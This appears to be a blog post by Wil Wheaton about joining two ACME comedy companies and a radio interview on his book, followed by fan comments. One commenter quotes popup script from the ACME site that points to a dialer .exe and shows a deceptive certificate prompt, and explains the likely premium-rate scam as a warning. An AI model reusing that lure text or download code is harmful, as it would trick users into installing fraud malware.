We’re done with our sketch writing process at ACME. For the last four weeks, we’ve met each Tuesday, and presented an original sketch. Most company members work on material together, so they effectively get more than one turn, (for example, if I write with Kevin, Chris, and Jodi, I’d have three chances that night to make the list of funny sketches that will go in front of an audience) but I live so goddamned far away from everyone else, I ended up writing solo all four turns this time, which seriously limited my chances of making the show. I lucked out, though, and hit the comedy artery with my funny probe: I went 3-4, and I’m pretty sure my rewrite will make it, too. Depending on how our previews go, and what happens with everyone’s schedules, I could be in ACME shows starting on Saturday, September 18.
We’ve also started a new ACME improv company, called Zebra Company. Some of the greatest improvisers in Los Angeles are in this group, and auditions were very tough. I was lucky enough to make that cast, too (!) and our improv shows start September 24th.
While I drank my coffee this morning, I looked at the ACME schedule for the rest of the year, and if I’m in both Zebra and ACME Main company, I’ll pretty much be living down at the theatre. I’m conflicted about that, because I’ve really grown accustomed to working from home, and hanging out with my family whenever I want . . . but on the other hand, some of the happiest times and best performances of my acting life have been in that theatre . . . and performing twice a week will certainly give me something interesting to write about on a more regular basis. Once rehearsals are done, though, I’ll only be there on the weekends, and I’ll have an opportunity, twice a week, to perform as an actor again, which I haven’t gotten to do in far too long.
I’ll be on The David Lawrence Show again tonight, to talk about Just A Geek. When I was there for Dancing Barefoot, David and I used the entire three hours, so we just planned on that for tonight. It’s 7-10 Pacific time, and all the listening details are on the Online Tonight website.
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good luck on the show! 🙂
Damn, Wil, making it into *both* ACME companies – you must still have some of “it” left. If I get out to L.A. for a weekend visit after your performances start in September, I’ll try to catch one. It would be great to see you on stage again. I only wish I could be at the Vegas con in a few weeks to see Earnest Borg-9 (and to hit the low-limit Hold ‘Em tables).
Wil, you are one great performer! When do you have time for yourself? I hope you take some time to relax and listen to some tunes. I can’t wait to read Just A Geek. I was waiting to buy it because I thought you might have some special sales on your site for signed copies.
I agree with Dave on all points!
You just keep getting busier and busier and in some ways that is a very good thing.. in others.. well it might hurt a bit.
Try to keep some time for your sanity too okay?
Your really busting your A**. Whatever vitamins your taking I want some too.
Good Luck with the show I am sure there will be some laughs.
Wooohooo! We get to see you bring on the funny twice weekly??? Rock on!
Good for you but be careful, the boys have also gotten used to the time you spend with them, and they seem to like it a lot.
The happy UPS man delivered my Dancing Barefoot and Just a Geek books yesterday afternoon. Yeah! Can’t wait to get started reading them!
Wow…way to go Wil. Looks like I will never get my interview at this rate. 😉 I am very happy to know that everything is going fantistic for you. Keep up the hard, wonderful work.
Live Long, And Prosper………
Keep connecting with people and being “real.”
It’s what makes you so cool, popular and different. Your boys are watching! How proud they must be!
Have a blast on the show. Nice working pace you are keeping up. GO! GO!
I know this is off-topic but I just watched you and the Traveller rescue your mother from a static warp bubble. And if Spike TV sticks with their *shedule*, your Final Mission should air Wed. night of next week–a great opportunity for Nolan and Ryan to watch their hero on TV.
Freeman 🙂
me and a buddy used to do improv bits at parties…so what you’re doing now sounds like alot of fun!
I just wanted to take a minute and say congrats on the shows!
Holy hand grenade! I got to hear my comment and AOLame screen name (SlicerJ) on the air!
I got to IM to a famous writer in the form of Wil.
Very good show – very smooth interaction between Wil and David.
And very good book so far. After reading Dancing, I had one blubbery moment and just 20 pages into Geek I’ve already hit another! Whoof. And as my own personal follow-up to one of my comments around Thanksgiving or Christmas last year, my dad moved back to Kansas City from Cincinnati just last week. I think I may go play catch with him. After I finish tuning his 802.11b wireless connection.
Thanks again, Uncle Willy.
Good luck with the new group. I also discovered a wesley episode on spike tv. It was a good one. It was the episode with the warp bubble.
Waiting patiently for Wil Wheaton’s HBO Comedy Special! 🙂
Just listened to the interview. You and David Lawrence seemed to click very well. I enjoyed it thoroughly.
I was checking out, “I, Robot” on Imdb.com and saw this under trivia:
Wil Wheaton auditioned for the part of Sonny the suspect robot.
did he ever post about this?
Check out January 16th.
Looks like a lot of ppl caught the warp bubble episode!
Wil…another great read!
Off Topic….but did anyone see this?
Let fiction become reality
Ebay auction number Item number: 2397756436
Hey Wil, I just saw flubber for the first time the other day (yeah, ok, call me lame). You did a great job at playing that evil little snot son! I had no idea you were in it. How much fun was it to work with Robin Williams!?
Kudos, Celti
A word about the ACME website if I may… I’m using Konqueror (today), and ACME is popping up a “Download Software” window. Which I can generally do without, but out of curiosity I looked at the popup’s HTML, and found this:
var dialUrl = ‘http://deposito.hostance.net/dialer/1037641.exe’;
var number = attempt;number++;
alert(‘To download the software press YES in the
certificate window you will see.Then you will be
able to download all the applications and
software you want!’);
and more. The last line is to get the user to agree to run the Windows EXE file.
I suspect this is a “dialer”: if so, any unprotected Windows user could innocently agree to it, install it, find their modem dialing a premium rate number at odd hours, and a huge phone bill going to someone else.
I will try to contact [email protected] , but I thought I should mention it here too.
Good thing I’m not using IE, eh? 8{
Dublin, Ireland
At least they don’t think you’re not “edgy” enough ^_^. Grats on that Wil – if I lived anywhere near there I’d go check out the show! And come now – we all find all the posts interesting dammit!
Jim Perry was the host of “Sale of the Century”. I am pleased that someone remembers that fine game show! Wil, you are a God!!
Whoa…. Wil, a friend of mine saw this on eBay, and I instantly thought of you. Check it out! Star Trek Apartment
Hey there Wil, I hope you enjoyed your time on the show, I am looking forward to Just a Geek, but no one is selling it over here. I can’t wait to read it.
Hey Wil,
Get the folks at Acme to update your bio on their web page.
Damn you, Wil Wheaton.
I’m a serial-processing reader. I know that, given the number of books I read, people would assume I read along a vector or at least in parallel (for you non-geeks, check out the terms in a computer dictionary). But no. I find annoyingly distracting to pick up a book while I’m in the middle of another book.
I walked in the house around 10 p.m. My seven-year old son was sick a cold. My wife was on business in Chicago. My 14-year old son was at camp and my 11-year old daughter was, as usual, on instant messenger.
My (what feels like daily) package from Amazon was sitting on the table. Wil Wheaton’s Just a Geek and Cory Doctorow’s Eastern Standard Tribe. I started flipping through Just A Geek and THREE hours later I’d finished about two-thirds of it. I would have kept going had I not fallen asleep.
You’re a natural, unforced writer. I don’t care if you’re a Star Trek fan or not, you should read this book. You should read this book if you’ve ever had really tough times. You should read this book if you’ve ever struggled with your own place in the world, your own self-esteem. You should read this book if you’ve ever tried to separate who you are from what you do.
Moreover, every blogger who wonders why they do this should read this book.
Thanks, Wil, for reinforcing the good name of honesty and openness.